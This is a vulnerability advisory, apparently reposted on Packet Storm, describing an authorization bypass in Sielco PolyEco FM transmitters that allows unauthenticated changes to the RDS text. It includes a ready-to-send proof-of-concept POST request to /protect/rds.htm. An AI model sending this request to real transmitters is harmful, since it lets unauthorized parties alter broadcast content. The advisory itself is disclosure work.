Security
Headlines
HeadlinesLatestCVEs

Headline

Sielco PolyEco Digital FM Transmitter 2.0.6 POST Manipulation

Sielco PolyEco Digital FM Transmitter version 2.0.6 suffers from a radio data system POST manipulation vulnerability.

Packet Storm
#vulnerability#web#mac#git#php#auth
Sielco PolyEco Digital FM Transmitter 2.0.6 Radio Data System POST ManipulationVendor: Sielco S.r.lProduct web page: https://www.sielco.orgAffected version: PolyEco1000 CPU:2.0.6 FPGA:10.19                  PolyEco1000 CPU:1.9.4 FPGA:10.19                  PolyEco1000 CPU:1.9.3 FPGA:10.19                  PolyEco500 CPU:1.7.0 FPGA:10.16                  PolyEco300 CPU:2.0.2 FPGA:10.19                  PolyEco300 CPU:2.0.0 FPGA:10.19Summary: PolyEco is the innovative family of high-end digitalFM transmitters of Sielco. They are especially suited as highperformance power system exciters or compact low-mid powertransmitters. The same cabinet may in fact be fitted with 50,100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,1000).All features can be controlled via the large touch-screen display4.3" or remotely. Many advanced features are inside by defaultin the basic version such as: stereo and RDS encoder, audiochange-over, remote-control via LAN and SNMP, "FFT" spectralanalysis of the audio sources, SFN synchronization and much more.Desc: Improper access control occurs when the application providesdirect access to objects based on user-supplied input. As a resultof this vulnerability attackers can bypass authorization and accessresources behind protected pages. The application interface allowsusers to perform certain actions via HTTP requests without performingany validity checks to verify the requests. This can be exploitedto perform certain actions and manipulate the RDS text display.Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5767Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php26.01.2023--POST /protect/rds.htm HTTP/1.1Host: RADIOFMrds_inta=1rds_intb=0rds_pi=381rds_ps=ZSLrds_rta=www.zeroscience.mkrds_rtbrds_rtt=0rds_tp=0rds_tp=1rds_ta=0rds_ms=0rds_pty=4rds_ptyn=        rds_ecc=00rds_ct=0rds_level=90rds_psd=0rds_psd1rds_pst1=0rds_psd5rds_pst5=0rds_psd2rds_pst2=0rds_psd6rds_pst6=0rds_psd3rds_pst3=0rds_psd7rds_pst7=0rds_psd4rds_pst4=0rds_psd8rds_pst8=0rds_di_pty=0rds_di_cmp=0rds_di_cmp=1rds_di_st=0rds_di_art=0rds_di_art=1a0=90a1=9a2=26a3=115a4=0a5=0a6=0a7=0a8=0a9=0a10=0a11=0a12=0a13=0a14=0a15=0a16=0a17=0a18=0a19=0a20=0a21=0a22=0a23=0a24=0

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution